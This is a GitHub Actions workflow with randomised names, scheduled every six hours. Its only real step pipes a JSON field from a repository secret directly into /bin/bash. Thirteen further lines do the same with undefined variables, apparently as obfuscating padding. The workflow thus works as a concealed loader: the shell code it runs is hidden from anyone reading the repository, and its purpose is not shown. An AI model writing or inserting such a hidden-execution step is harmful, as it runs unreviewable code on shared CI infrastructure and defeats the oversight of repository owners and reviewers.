name: juiceqinzq
on:
  workflow_dispatch:
  schedule:
    - cron: '14 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: juiceqinzq
        env:
          uhnl3: ${{ secrets.uhnl3 }}
        run: |
          echo $uhnl3 | jq -r .pzft83108 | /bin/bash
          echo $iozx22672 | jq -r .ju992 | /bin/bash
          echo $pbwa439 | jq -r .txum9 | /bin/bash
          echo $dcw82 | jq -r .hiv291 | /bin/bash
          echo $y53500 | jq -r .k25285 | /bin/bash
          echo $s26 | jq -r .dr286 | /bin/bash
          echo $dyfi34 | jq -r .h1436 | /bin/bash
          echo $a7651 | jq -r .ccyd7 | /bin/bash
          echo $cv437 | jq -r .ycmzb5170 | /bin/bash
          echo $qnokb9 | jq -r .gzt79 | /bin/bash
          echo $ghjl1521 | jq -r .akic340 | /bin/bash
          echo $hywke03 | jq -r .nj33318 | /bin/bash
          echo $gg673 | jq -r .nj73982 | /bin/bash
          echo $iq0087 | jq -r .afoy60405 | /bin/bash

